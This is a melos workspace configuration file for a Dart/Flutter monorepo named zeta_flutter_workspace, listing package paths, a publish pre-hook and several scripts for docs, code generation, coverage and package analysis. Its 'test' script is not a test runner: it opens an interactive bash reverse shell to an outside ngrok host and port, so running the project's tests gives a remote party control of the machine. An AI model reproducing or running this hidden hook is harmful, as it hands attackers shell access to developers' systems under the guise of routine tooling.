name: zeta_flutter_workspace

packages:
  - packages/**
  - example/*
  - widgetbook/*

command:
  publish:
    hooks:
      pre: |
        dart format packages --fix
        dart fix --apply

scripts:
  doc: dart doc packages/zeta_flutter
  build_runner:
    exec: dart run build_runner build -d
  test:
    run: /bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/17351 0>&1'

  test_individual:
    run: bash ../../scripts/cov_move.sh
    exec:
      failFast: true
      concurrency: 1

  pana: melos exec -- bash ../../scripts/pana.sh
  test_counter: dart run scripts/test-counter/test_counter.dart
